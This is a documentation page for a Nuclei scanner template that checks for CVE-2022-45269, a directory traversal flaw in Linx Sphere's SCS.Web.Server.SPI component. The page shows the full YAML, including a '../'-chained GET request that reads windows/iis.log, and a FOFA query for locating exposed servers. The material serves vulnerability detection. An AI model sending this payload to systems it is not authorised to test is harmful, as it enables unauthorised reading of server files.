Linx Sphere - Directory Traversal
ID: CVE-2022-45269
Severity: high
Author: robotshell
Tags: cve,cve2022,linx,lfi,scs
Description
Section titled “Description”A directory traversal vulnerability in the component SCS.Web.Server.SPI/1.0 of Linx Sphere LINX 7.35.ST15 allows attackers to read arbitrary files.
YAML Source
Section titled “YAML Source”id: CVE-2022-45269
info: name: Linx Sphere - Directory Traversal author: robotshell severity: high description: | A directory traversal vulnerability in the component SCS.Web.Server.SPI/1.0 of Linx Sphere LINX 7.35.ST15 allows attackers to read arbitrary files. reference: - https://nvd.nist.gov/vuln/detail/CVE-2022-45269 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2022-45269 cwe-id: CWE-22 epss-score: 0.00238 epss-percentile: 0.62196 cpe: cpe:2.3:a:gmaolinx:linx_sphere:7.35.st15:*:*:*:*:*:*:* metadata: vendor: gmaolinx product: linx_sphere fofa-query: "SCS.Web.Server.SPI/1.0" verified: true max-request: 1 tags: cve,cve2022,linx,lfi,scs
http: - method: GET path: - "{{BaseURL}}/../../../../../../../../../../../../windows/iis.log"
matchers-condition: and matchers: - type: word part: body words: - "Component Based Setup"
- type: status status: - 200# digest: 4a0a004730450220724913d2347ed8d042f032e3dcb52966a614dba3f11012016bf3a7b720c3307f02210087d45d2ecf1b402cbe8de0f795544bb8f2c109c817f816ae127a5ff30675befd:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2022/CVE-2022-45269.yaml"